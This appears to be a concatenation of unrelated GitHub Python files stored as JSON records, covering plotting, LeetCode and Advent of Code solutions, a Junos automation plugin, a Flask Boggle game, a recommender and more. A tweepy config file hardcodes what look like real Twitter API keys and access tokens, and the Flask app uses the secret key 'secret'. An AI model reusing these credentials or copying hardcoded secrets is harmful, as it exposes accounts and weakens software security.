Loads one of the custom cmaps from the cmaps folder.\n\n Parameters\n ----------\n cmap_name : str\n The name of the cmap file without the extension.\n\n Returns\n -------\n Tuple[LinearSegmentedColormap, Union[None, Tuple]]\n A tuple of the cmap and a list of colors if n_colors is not None.\n \n Example\n -------\n >>> cmap_name = 'hawaii'\n >>> cmap, color_list = get_cmap(cmap_name, n_colors=10)\n \"\"\"\n from pathlib import Path as PathClass\n \n cm_path = PathClass(__file__).parent / ('cmaps/' + cmap_name + '.txt')\n cm_data = np.loadtxt(cm_path)\n cmap_name = cmap_name.split('.')[0]\n cmap = LinearSegmentedColormap.from_list(cmap_name, cm_data)\n if n_colors is None:\n n_colors = 10\n color_list = cmap(np.linspace(0, 1, n_colors))\n return cmap, color_list\n\n\n\n ","repo_name":"joshuawe/plots_and_graphs","sub_path":"plotsandgraphs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"16553528328","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nres = 0\nclass Solution(object):\n def sumNumbers2(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n global res\n res = 0\n path = []\n def dfs(node, path):\n if not node:\n return \n path.append(node.val)\n global res\n if node.left == None and node.right == None:\n n = len(path)\n for i in range(n-1, -1, -1):\n res += path[i]* (10**(n-1-i))\n dfs(node.left, path)\n dfs(node.right, path)\n path.pop()\n dfs(root,path)\n return res\n \n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n return self.traverse_sum(root, 0)\n def traverse_sum(self, node, parent_val):\n if not node:\n return 0\n if node.left == None and node.right == None:\n return parent_val*10 + node.val\n else:\n return self.traverse_sum(node.left, parent_val*10 + node.val) + \\\n self.traverse_sum(node.right, parent_val*10+node.val)","repo_name":"saai/codingcat","sub_path":"tree/sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18940354656","text":"from lxml import etree\nimport re\nimport logging\nfrom collections import OrderedDict\nfrom nornir.plugins.tasks.networking import netmiko_send_command\nfrom nornir.core.task import Result, Task\ninvaild_cmd = re.compile('^(request|clear|start|restart).*')\nget_config = re.compile('^show configuration .*')\n\nlogger = logging.getLogger(__name__)\ndef _count(txt, none): # Second arg for consistency only. noqa\n \"\"\"\n Return the exact output, as Junos displays\n e.g.:\n > show system processes extensive | match root | count\n Count: 113 lines\n \"\"\"\n count = len(txt.splitlines())\n return \"Count: {count} lines\".format(count=count)\n\ndef _trim(txt, length):\n \"\"\"\n Trim specified number of columns from start of line.\n \"\"\"\n try:\n newlines = []\n for line in txt.splitlines():\n newlines.append(line[int(length) :])\n return \"\\n\".join(newlines)\n except ValueError:\n return txt\n\ndef _except(txt, pattern):\n \"\"\"\n Show only text that does not match a pattern.\n \"\"\"\n rgx = \"^.*({pattern}).*$\".format(pattern=pattern)\n unmatched = [\n line for line in txt.splitlines() if not re.search(rgx, line, re.I)\n ]\n return \"\\n\".join(unmatched)\n\ndef _last(txt, length):\n \"\"\"\n Display end of output only.\n \"\"\"\n try:\n return \"\\n\".join(txt.splitlines()[(-1) * int(length) :])\n except ValueError:\n return txt\n\ndef _match(txt, pattern):\n \"\"\"\n Show only text that matches a pattern.\n \"\"\"\n rgx = \"^.*({pattern}).*$\".format(pattern=pattern)\n matched = [line for line in txt.splitlines() if re.search(rgx, line, re.I)]\n return \"\\n\".join(matched)\n\ndef _find(txt, pattern):\n \"\"\"\n Search for first occurrence of pattern.\n \"\"\"\n rgx = \"^.*({pattern})(.*)$\".format(pattern=pattern)\n match = re.search(rgx, txt, re.I | re.M | re.DOTALL)\n if match:\n return \"{pattern}{rest}\".format(pattern=pattern, rest=match.group(2))\n else:\n return \"\\nPattern not found\"\n\ndef _process_pipe(cmd, txt):\n \"\"\"\n Process CLI output from Juniper device that\n doesn't allow piping the output.\n \"\"\"\n if txt is None:\n return txt\n _OF_MAP = OrderedDict()\n _OF_MAP[\"except\"] = _except\n _OF_MAP[\"match\"] = _match\n _OF_MAP[\"last\"] = _last\n _OF_MAP[\"trim\"] = _trim\n _OF_MAP[\"count\"] = _count\n _OF_MAP[\"find\"] = _find\n # the operations order matter in this case!\n exploded_cmd = cmd.split(\"|\")\n pipe_oper_args = {}\n for pipe in exploded_cmd[1:]:\n exploded_pipe = pipe.split()\n pipe_oper = exploded_pipe[0] # always there\n pipe_args = \"\".join(exploded_pipe[1:2])\n # will not throw error when there's no arg\n pipe_oper_args[pipe_oper] = pipe_args\n for oper in _OF_MAP.keys():\n # to make sure the operation sequence is correct\n if oper not in pipe_oper_args.keys():\n continue\n txt = _OF_MAP[oper](txt, pipe_oper_args[oper])\n return txt\n\n\ndef junos_get(task, commands):\n if 'napalm' not in task.host.connections:\n task.host.open_connection(\"napalm\", None)\n dev = task.host.get_connection(\"napalm\", None).device\n result = {}\n for command in commands:\n if not invaild_cmd.match(command):\n #(cmd, _, _) = command.partition(\"|\")\n cmds = command.split('|')\n display = ''\n for item in cmds:\n if 'display' in item:\n display = '|' + item\n cmd_result = dev.rpc.cli(command=cmds[0]+display, format='text')\n cmd_result = etree.tostring(cmd_result, encoding='unicode')\n cmd_result = _process_pipe(command,cmd_result)\n result[command] = cmd_result\n\n else:\n logger.info('Invaild command: ' + command)\n return Result(host=task.host, result=result)\n\n \n \n\n\n \n\n","repo_name":"Vicnz03/nornir-play","sub_path":"plugins/junos_get.py","file_name":"junos_get.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2117546488","text":"# part 2: rope of length 10\nimport math\nclass Motion:\n def __init__(self, direction, distance):\n self.direction = direction\n self.distance = int(distance)\n\n def __str__(self):\n return f\"{self.direction} {self.distance}\"\n \nclass Rope:\n def __init__(self, row_init, col_init, rope_length):\n # Do this instead of [[]] * 10 because otherwise all lists are identical in memory\n self.rope_positions = [[row_init, col_init] for _ in range(rope_length)]\n\n def update_head(self, motion):\n if motion.direction == \"U\":\n self.rope_positions[0][0] -= 1\n elif motion.direction == \"D\":\n self.rope_positions[0][0] += 1\n elif motion.direction == \"L\":\n self.rope_positions[0][1] -= 1\n elif motion.direction == \"R\":\n self.rope_positions[0][1] += 1\n\n self.update_rope_positions()\n \n def update_rope_positions(self):\n # slicing off the first one since we already updated the head\n for head_knot_idx, tail_knot in enumerate(self.rope_positions[1:]):\n head_knot = self.rope_positions[head_knot_idx]\n tail_knot = self.update_knot_position(head_knot, tail_knot)\n\n def tail_position(self):\n return self.rope_positions[-1][0], self.rope_positions[-1][1]\n\n def update_knot_position(self, head_knot, tail_knot):\n row_distance = abs(head_knot[0] - tail_knot[0])\n col_distance = abs(head_knot[1] - tail_knot[1])\n if row_distance == 2 or col_distance == 2: # head and tail are two rows apart\n if head_knot[1] > tail_knot[1]: # head is to the right of tail\n tail_knot[1] += 1\n elif head_knot[1] < tail_knot[1]: # head is to the left of tail\n tail_knot[1] -= 1\n\n if head_knot[0] > tail_knot[0]: # head is below tail\n tail_knot[0] += 1 # move tail one row down\n elif head_knot[0] < tail_knot[0]: # head is above tail\n tail_knot[0] -= 1 # move tail one row up\n return tail_knot\n\nmotion_list = []\nwith open(\"input.txt\") as f: \n for line in f:\n l = line.strip().split(\" \")\n new_motion = Motion(l[0], int(l[1]))\n motion_list.append(new_motion)\n\ntail_location_set = set()\n\nrope = Rope(0, 0, 10)\nfor motion in motion_list:\n for _ in range(motion.distance):\n rope.update_head(motion)\n \n tail_row_idx, tail_col_idx = rope.tail_position()\n tail_location_set.add((tail_row_idx, tail_col_idx))\n\nvisited_spaces = len(list(tail_location_set))\nprint(visited_spaces)","repo_name":"stephenwashington/advent-of-code-2022","sub_path":"day9/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25009535347","text":"#! /usr/bin/env python\n\nimport sys\nfrom operator import mul\n\ndef wrap(dims):\n l, w, h = map(int, dims.split('x'))\n nums = [l*w, w*h, h*l]\n return min(nums) + 2*sum(nums)\n\ndef ribbon(dims):\n nums = map(int, dims.split('x'))\n product = reduce(mul, nums, 1)\n nums.remove(max(nums))\n return 2*sum(nums) + product\n\ntotal = 0\nribbon_total = 0\nfor line in sys.stdin:\n total += wrap(line)\n ribbon_total += ribbon(line)\nprint('Total square feet required: %d' % total)\nprint('Total ribbon required: %d' % ribbon_total)\n","repo_name":"vinceau/adventofcode","sub_path":"2015/day2/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18584704283","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nn = 12\r\nX = np.arange(n) #range()只能整数\r\nY1 = (1 - X / float(n)) * np.random.uniform(0.5,1.0,n)\r\nY2 = (1 - X / float(n)) * np.random.uniform(0.5,1.0,n)\r\n\r\nplt.bar(X,+Y1,facecolor='#9999ff',edgecolor='white')#条形图颜色\r\nplt.bar(X,-Y2,facecolor='#ff9999',edgecolor='white')\r\n\r\n#加标注\r\nfor x,y in zip(X,Y1): #通过zip()使每一步同时输出两个值 用时详查\r\n plt.text(x ,y + 0.05,'%.2f'%y, ha='center',va='bottom') #ha:horizontal alignment 横向对齐方式 va:纵向\r\nfor x,y in zip(X,Y2): #通过zip()使每一步同时输出两个值 用时详查\r\n plt.text(x ,-y - 0.05,'-%.2f'%y, ha='center',va='top') #ha:horizontal alignment 横向对齐方式 va:纵向\r\n\r\nplt.xlim(-0.5,n)\r\nplt.xticks(())\r\nplt.ylim(-1.25,1.25)\r\nplt.yticks(())\r\n\r\nplt.show()","repo_name":"XiaoMaFenJu/matplotlib","sub_path":"matplotlib_learn_bar.py","file_name":"matplotlib_learn_bar.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11241415947","text":"#coding=utf-8\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef curve_in_create(lift_data,file_name):\r\n\r\n lines = [\r\n \"TEMPORAL\",\r\n \"valve\",\r\n \"direction 0 0 -1\",\r\n \"min_lift 1e-05\",\r\n \"CYCLIC 360.0\",\r\n \"crank lift\",\r\n ]\r\n\r\n # Open the file in write mode\r\n with open(file_name, \"w\") as file:\r\n # Write the first 6 lines\r\n for line in lines:\r\n file.write(line + \"\\n\")\r\n\r\n # Write the lift_data\r\n for data in lift_data:\r\n line = f\"{data[0]} {data[1]}\"\r\n file.write(line + \"\\n\")\r\n\r\n print(f\"File {file_name} created.\")\r\n\r\ndef poly5(x,load,index):\r\n '''\r\n 该函数应该包括8个5次多项式,load有四种:100Load,75Load,50Load,25Load,index有两种:qian,hou\r\n 本文件中以75Load为基准,所有负荷采用相同的系数'''\r\n coefficients = {\r\n '100Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4], \r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4], \r\n },\r\n '75Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4],\r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4],\r\n },\r\n '50Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4], \r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4],\r\n },\r\n '25Load': {\r\n 'qian': [-6.13325E-8, 3.37332E-6, -6.81692E-5, 6.6485E-4, -7.40193E-4, 4.92942E-4], \r\n 'hou': [-8.5746E-9, -7.19828E-7, -1.8133E-5, -1.1418E-4, -0.00117, -3.15943E-4], \r\n },\r\n }\r\n \r\n # Get the coefficients for the given load and index\r\n a, b, c, d, e, f = coefficients[load][index]\r\n\r\n # Evaluate the polynomial at x using the coefficients\r\n y = a * x**5 + b * x**4 + c * x**3 + d * x**2 + e * x + f\r\n \r\n return y\r\n\r\ndef EVlift(load,EVO,EVC,max_lift):\r\n '''\r\n 该函数用于构造升程曲线'''\r\n CA=np.arange(0,360.5,0.5)\r\n S1=[]\r\n S2=[]\r\n for x in np.arange(0,180,0.5):\r\n if x<=EVO:\r\n S1.append(0)\r\n elif x>EVO and poly5(x-EVO,load,index='qian')=EVC:\r\n S2.append(0)\r\n elif x= 16 and age <= 65:\n# print(\"Have a good day at work!\")\n\n\n# Python allows ranges to be expressed in this condensed format\nif 16 <= age <= 65:\n print(\"Have a good day at work!\")\n\n# Python does not have a boolean data type, but it has two constants \"True\" and \"False\"\n# The function bool coerces to the appropriate value\nif False or True:\n print(\"Okay\")\n\nprint(\"\"\"False: {}\nNone: {}\n0: {}\n0.0: {}\nempty List []: {}\nempty tuple (): {}\nempty string '': {}\nempty string \"\": {}\nempty mapping: {}\n\"\"\".format(False, bool(None), bool(0), bool(0.0), bool([]), bool(()), bool(''), bool(\"\"), bool({})))\n\n# Negation is performed using the not keyword\nprint(\"not False is {}\".format(not False))\n","repo_name":"Hardeep18/python-masterclass","sub_path":"IfProgramFlow/IfProgramFlow.py","file_name":"IfProgramFlow.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18313581965","text":"import argparse\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport math\nimport os \nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.stats import pearsonr\nfrom collections import defaultdict\nfrom tqdm import tqdm\nfrom evaluate import rec_eval\n\n\ndef load_data(file_path):\n \"\"\"\n 加载数据\n \"\"\"\n with open(os.path.join(file_path,'train_users.txt'), 'rb') as f1:\n train_users = pickle.load(f1)\n with open(os.path.join(file_path,'valid_users.txt'), 'rb') as f2:\n valid_users = pickle.load(f2) \n\n return train_users, valid_users\n\n\ndef Cosine_UserCF(tra_users, val_users, K , N):\n \"\"\"\n 仅预测是否会评分,不包含具体rating\n \"\"\"\n # 建立item->users倒排表\n # 倒排表的格式为: {item_id1: {user_id1, user_id2, ... , user_idn}, item_id2: ...} 也就是每个item对应有那些用户有过点击\n # 建立倒排表的目的就是为了更方便的统计用户之间共同交互的商品数量\n print('建立倒排表...')\n item_users = {}\n for uid, items in tqdm(tra_users.items()): # 遍历每一个用户的数据,其中包含了该用户所有交互的item\n for item in items: # 遍历该用户的所有item, 给这些item对应的用户列表添加对应的uid\n if item not in item_users:\n item_users[item] = set()\n item_users[item].add(uid)\n\n\n # 只要用户u,v共同交互过某个物品,它们之间的相似度就 +1 ---> 协同过滤矩阵\n # 最后再除以 sqrt(N(u)*N(v)) ---> 相似度矩阵\n\n\n # 计算用户协同过滤矩阵 \n # 即利用item-users倒排表统计用户之间交互的商品数量,用户协同过滤矩阵的表示形式为:sim = {user_id1: {user_id2: num1}, user_id3:{user_id4: num2}, ...}\n # 协同过滤矩阵是一个双层的字典,用来表示用户之间共同交互的商品数量\n # 在计算用户协同过滤矩阵的同时还需要记录每个用户所交互的商品数量,其表示形式为: num = {user_id1:num1, user_id2:num2, ...}\n sim = {}\n num = {}\n print('构建协同过滤矩阵...')\n for item, users in tqdm(item_users.items()): # 遍历所有的item去统计,用户两两之间共同交互的item数量\n for u in users:\n if u not in num: # 如果用户u不在字典num中,提前给其在字典中初始化为0,否则后面的运算会报key error\n num[u] = 0\n num[u] += 1 # 统计每一个用户,交互的总的item的数量\n if u not in sim: # 如果用户u不在字典sim中,提前给其在字典中初始化为一个新的字典,否则后面的运算会报key error\n sim[u] = {}\n for v in users:\n if u != v: # 只有当u不等于v的时候才计算用户之间的相似度 \n if v not in sim[u]:\n sim[u][v] = 0\n sim[u][v] += 1\n\n # 计算用户相似度矩阵 step2\n # 用户协同过滤矩阵其实相当于是余弦相似度的分子部分,还需要除以分母,即两个用户分别交互的item数量的乘积\n # 两个用户分别交互的item数量的乘积就是上面统计的num字典\n print('计算相似度...')\n for u, users in tqdm(sim.items()):\n for v, score in users.items():\n sim[u][v] = score / math.sqrt(num[u] * num[v]) # 余弦相似度分母部分 \n \n\n # 对验证数据中的每个用户进行TopN推荐\n # 在对用户进行推荐之前需要先通过相似度矩阵得到与当前用户最相似的前K个用户,\n # 然后对这K个用户交互的商品中除当前测试用户训练集中交互过的商品以外的商品计算最终的相似度分数\n # 最终推荐的候选商品的相似度分数是由多个用户对该商品分数的一个累加和\n print('给测试用户进行推荐...')\n rec_dict = {}\n for u, _ in tqdm(val_users.items()): # 遍历测试集用户,给测试集中的每个用户进行推荐\n rec_dict[u] = {} # 初始化用户u的候选item的字典\n for v, score in sorted(sim[u].items(), key=lambda x: x[1], reverse=True)[:K]: # 选择与用户u最相似的k个用户\n for item in tra_users[v]: # 遍历相似用户之间交互过的商品\n if item not in tra_users[u]: # 如果相似用户交互过的商品,测试用户在训练集中出现过,就不用进行推荐,直接跳过\n if item not in rec_dict[u]:\n rec_dict[u][item] = 0 # 初始化用户u对item的相似度分数为0\n rec_dict[u][item] += score # 累加所有相似用户对同一个item的分数\n \n print('为每个用户筛选出相似度分数���高的N个商品...')\n if not N:\n Top50_rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:50] for k, v in rec_dict.items()}\n Top50_rec_dict = {k: list([x[0] for x in v]) for k, v in Top50_rec_dict.items()}\n Top10_rec_dict = {k: v[:10] for k, v in Top50_rec_dict.items()}\n Top20_rec_dict = {k: v[:20] for k, v in Top50_rec_dict.items()}\n return Top10_rec_dict, Top20_rec_dict, Top50_rec_dict, rec_dict\n else:\n rec_dict = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in rec_dict.items()}\n rec_dict = {k: list([x[0] for x in v]) for k, v in rec_dict.items()}\n return rec_dict\n\ndef save_rec_dict(save_path,rec_dict):\n pickle.dump(rec_dict, open(os.path.join(save_path,'UserCF_rec_dict.txt'), 'wb'))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--TopN', type=int, default=0, help='number of top score items selected')\n parser.add_argument('--TopK', type=int, default=100, help='number of similar items/users')\n parser.add_argument('--rmse', action='store_true', help='number of similar items/users')\n args = parser.parse_args()\n\n train_users, valid_users = load_data(file_path='./data')\n\n if not args.TopN:\n Top10_rec_dict, Top20_rec_dict, Top50_rec_dict, rec_dict = Cosine_UserCF(train_users, valid_users, args.TopK ,args.TopN)\n print('Top 10:')\n rec_eval(Top10_rec_dict,valid_users,train_users)\n print('Top 20:')\n rec_eval(Top20_rec_dict,valid_users,train_users)\n print('Top 50:')\n rec_eval(Top50_rec_dict,valid_users,train_users)\n save_rec_dict('./data',rec_dict)\n print('Done.')\n else:\n rec_dict = Cosine_UserCF(train_users, valid_users, args.TopK ,args.TopN)\n print(f'Top {args.TopN}:')\n rec_eval(rec_dict,valid_users,train_users)\n print('Done.')\n","repo_name":"Guadzilla/Basics-of-Recsys","sub_path":"task9/UserCF.py","file_name":"UserCF.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70418778890","text":"class RBF(Kernel):\n\n def __init__(self, sigma: float = 1.0):\n self.sigma = sigma\n\n def kernel(self, X, Y):\n X = np.array(X)\n Y = np.array(Y)\n\n if X.ndim == 1 and Y.ndim == 1:\n norm = np.sum((X - Y) ** 2)\n elif X.ndim == 1:\n norm = np.sum((X[None, :] - Y) ** 2, axis=1)\n elif Y.ndim == 1:\n norm = np.sum((X - Y[None, :]) ** 2, axis=1)\n else:\n norm = np.sum((X[..., :, None, :] -\n Y[..., None, :, :]) ** 2, axis=-1)\n return np.exp(-norm / (2 * self.sigma**2))\n\n\nclass Linear(Kernel):\n\n def kernel(self, X, Y):\n X = np.array(X)\n Y = np.array(Y)\n\n if X.ndim == 1 and Y.ndim == 1:\n return X * Y\n elif X.ndim == 1:\n return Y @ X\n elif Y.ndim == 1:\n return X @ Y\n else:\n return np.einsum(\"...id,...jd->...ij\", X, Y)\n","repo_name":"gbelouze/mva-kernel-hw3","sub_path":"reports/snippets/ex1_q2a.py","file_name":"ex1_q2a.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70682033607","text":"from curses import reset_prog_mode, reset_shell_mode\nfrom boggle import Boggle\nfrom flask import Flask, request, render_template, session, redirect, jsonify\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"secret\"\n\nboggle_game = Boggle()\n\n@app.route('/')\ndef index():\n \"\"\"Show homepage.\"\"\"\n boggle_board = boggle_game.make_board()\n session[\"boggle_board\"] = boggle_board\n highscore = session.get(\"highscore\", 0)\n nplays = session.get(\"nplays\", 0)\n return render_template(\"index.html\", board = boggle_board, highscore=highscore, nplays=nplays)\n\n@app.route('/guess')\ndef submit_guess():\n \"\"\"User submits guess\"\"\"\n word = request.args.get(\"word\")\n board = session[\"boggle_board\"]\n result = boggle_game.check_valid_word(board, word)\n return jsonify(result=result)\n\n@app.route('/submit-score', methods=[\"POST\"])\ndef save_game():\n \"\"\"User saves game stats\"\"\"\n score = request.json[\"score\"]\n highscore = session.get(\"highscore\", 0)\n nplays = session.get(\"nplays\", 0)\n session['nplays'] = nplays + 1\n session['highscore'] = max(score, highscore)\n return jsonify(brokeRecord=score > highscore)\n\n@app.route('/end-game')\ndef restart_game():\n \"\"\"re-initiates game\"\"\"\n return redirect('/')","repo_name":"erichard413/Boggle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12130162264","text":"#Python program to check a String is palindrome or not\r\nstr1 = input(\"Enter a string\")\r\nstr1 = str1.lower().replace(\" \", \"\")\r\nrev_str1 = \"\"\r\n\r\nfor i in range(len(str1)-1, -1, -1):\r\n rev_str1 += str1[i]\r\n\r\nif rev_str1 == str1:\r\n print(f\"{str1} is a Palindrome\")\r\nelse:\r\n print(f\"{str1} is not a Palindrome\")","repo_name":"Manasa-Shivarudra/Python-DataStructures-and-Coding","sub_path":"Strings/palindromeforloop.py","file_name":"palindromeforloop.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40965367090","text":"# -*- coding: utf-8 -*-\n\nfrom jinja2 import TemplateNotFound\nfrom flask import Blueprint, render_template, abort\n\nadmin = Blueprint('admin', __name__)\n\n@admin.route('/')\ndef defalut():\n try:\n return render_template('admin/default.html')\n except TemplateNotFound:\n abort(404)\n","repo_name":"tottily/terabithia","sub_path":"river/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4843371999","text":"\"\"\"\r\nTask 1\r\n\r\nFizzBuzz has been used as a common challenge during programmer interviews, it requires the\r\ninterviewee to write code that prints the numbers between 1 and 100 with the following rules:\r\n\r\n•If a number is divisible by 3, print “Fizz”\r\n•If a number is divisible by 5, print “Buzz”\r\n•If a number is divisible by both 3 and 5, print “FizzBuzz”\r\n•Otherwise, print the number\r\n\r\nImplement a function that will work through FizzBuzz for the specified number range. Your program\r\nshould ask the user for a high and low value before running the function.\r\n\r\nSave your program as ex10.py.\r\n\r\n\"\"\"\r\n\r\n#should ask the user for a high and low value before running the function.\r\n#value = input(int(Enter a value betwwen 0(low) and 100(high)))\r\n\r\n\r\n#function\r\ndef FizzBuzz (low,high):\r\n for num in range(low,high):\r\n if num%3==0 and num%5==0:\r\n print(\"FizzBuzz\")\r\n elif num%3==0:\r\n print(\"Fizz\")\r\n elif num%5==0:\r\n print(\"Buzz\")\r\n else:\r\n print(num)\r\n\r\nFizzBuzz(1,100)\r\n","repo_name":"IMDCGP105-1819/portfolio-s184286","sub_path":"python ex10.py","file_name":"python ex10.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"905268394","text":"import tweepy\r\nimport logging\r\nimport os\r\n\r\nlogger = logging.getLogger()\r\n\r\ndef create_api():\r\n consumer_key = \"n4QQQaLtC70dsi54adwRuFMCW\"\r\n consumer_secret = \"GrsLdf2drgLFkT8FpFzPeLrBrFTFlHY4LN6h7EiVamY7GefiHE\"\r\n access_token = \"1377622154683019265-wB6k2RuIfNGcth52wDEO6bGPnzyXYw\"\r\n access_token_secret = \"8RTqizUFIrmg7LAAawJXDwZF7w1qHoPdypvpIRYd6ji5B\"\r\n\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth, wait_on_rate_limit=True, \r\n wait_on_rate_limit_notify=True)\r\n try:\r\n api.verify_credentials()\r\n except Exception as e:\r\n logger.error(\"Error creating API\", exc_info=True)\r\n raise e\r\n logger.info(\"API created\")\r\n return api","repo_name":"PaulBagnis/TweetBot","sub_path":"tweepy-bots/bots/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37928147272","text":"import globalVars as g\r\nfrom entityClass import Entity\r\n\r\nclass Player(Entity):\r\n def __init__(self, x, y, r, c):\r\n super().__init__(x, y, r, c)\r\n self.speed = 3\r\n\r\n def update(self, direction, render):\r\n self.movement(direction)\r\n game_over = self.zombieCollision()\r\n self.draw(render)\r\n return game_over\r\n\r\n def zombieCollision(self):\r\n game_over = False\r\n for z in g.zombies:\r\n if g.dist(self,z) <= self.r + z.r:\r\n g.loss = True\r\n game_over = True\r\n return game_over\r\n\r\n def movement(self, direction):\r\n self.vel = {'x': direction['x']*self.speed, 'y': direction['y']*self.speed}\r\n\r\n self.normalizeSpeed()\r\n\r\n if self.x + self.r + self.vel['x'] > g.gameWidth or self.x - self.r + self.vel['x'] < 0:\r\n self.vel['x'] = 0\r\n if self.y + self.r + self.vel['y'] > g.gameHeight or self.y - self.r + self.vel['y'] < 0:\r\n self.vel['y'] = 0\r\n\r\n \r\n self.x += self.vel['x']\r\n self.y += self.vel['y']\r\n g.cameraX += self.vel['x']\r\n g.cameraY += self.vel['y']\r\n \r\n\r\n","repo_name":"BenWillis0/actor-critic","sub_path":"playerClass.py","file_name":"playerClass.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1569580225","text":"import numpy as np\nimport os\n\ndef walkFile(file):\n fileList = []\n for root, dirs, files in os.walk(file):\n for f in files:\n fileList.append(os.path.join(root, f))\n return fileList\n\nfileList1=walkFile(\"Normal\")\nfileList2=walkFile(\"Crackle\")\nfileList3=walkFile(\"Wheeze\")\nfileList4=walkFile(\"Crackle_Wheeze\")\n\nimport librosa\ndef get_feature(filelist):\n features=[]\n for i in filelist:\n wav, sample_rate = librosa.load(i, sr=19063)\n mel_spec = librosa.feature.melspectrogram(wav, sample_rate, n_fft=2048, hop_length=512, n_mels=224)\n logmel_spec = librosa.power_to_db(mel_spec)\n logmel_spec=logmel_spec.T\n logmel_spec=np.reshape(logmel_spec,(224,224,1))\n logmel_spec=np.concatenate((logmel_spec,logmel_spec,logmel_spec),axis=-1)\n features.append(logmel_spec)\n return features\n\nfrom threading import Thread\nclass MyThread2(Thread):\n def __init__(self,fileListName):\n Thread.__init__(self)\n self.fileList=fileListName\n\n def run(self):\n self.result = get_feature(self.fileList)\n\n def get_result(self):\n return self.result\n\nMythd1 = MyThread2(fileList1)\nMythd2 = MyThread2(fileList2)\nMythd3 = MyThread2(fileList3)\nMythd4 = MyThread2(fileList4)\n\nMythd1.start()\nMythd2.start()\nMythd3.start()\nMythd4.start()\n\nMythd1.join()\nMythd2.join()\nMythd3.join()\nMythd4.join()\n\nfeatures1=Mythd1.get_result()\nfeatures2=Mythd2.get_result()\nfeatures3=Mythd3.get_result()\nfeatures4=Mythd4.get_result()\n\nnp.save('Feature_CNN_Normal.npy',features1)\nnp.save('Feature_CNN_Crackle.npy',features2)\nnp.save('Feature_CNN_Wheeze.npy',features3)\nnp.save('Feature_CNN_Crackle&Wheeze.npy',features4)\n","repo_name":"Epyoyo/LSR-Net","sub_path":"GetCNNFeature.py","file_name":"GetCNNFeature.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5708801490","text":"__author__ = 'one'\n\nfrom openerp import models, api, fields, _\n\n\nclass ModelImport(models.TransientModel):\n _name = 'builder.website.asset.data.wizard'\n\n module_id = fields.Many2one('builder.ir.module.module', 'Module', ondelete='CASCADE')\n data_ids = fields.Many2many('builder.data.file', 'builder_website_asset_data_file_rel', 'wizard_id', 'data_id', 'Files')\n\n @api.one\n def action_import(self):\n asset_model_name = self.env.context.get('asset_model', 